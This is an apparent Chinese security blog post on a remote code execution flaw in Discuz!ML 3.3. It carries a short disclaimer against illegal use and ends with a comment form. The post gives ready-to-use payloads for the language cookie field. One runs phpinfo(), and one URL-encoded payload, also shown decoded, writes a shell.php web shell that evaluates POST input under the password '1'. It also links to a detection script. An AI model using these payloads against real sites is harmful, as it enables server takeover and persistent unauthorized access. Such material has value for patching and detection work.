News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

Discuz!ml3.3前台命令执行漏洞 可getshell

jasonx 414 0 条

代码执行

访问127.0.0.1/home.php,访问其他文件也可以。
cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE

抓包找到cookie的language的值修改为

xxxx_xxxx_language=sc'.phpinfo().'

1.jpg

getshell

%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27

实际为:

'.+file_put_contents('shell.php',urldecode('<?php eval($_POST["1"]);?>')).'

即可在路径下生成shell.php,连接密码为1

2.jpg

3.jpg

漏洞检测脚本

https://github.com/theLSA/discuz-ml-rce

发表我的评论

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址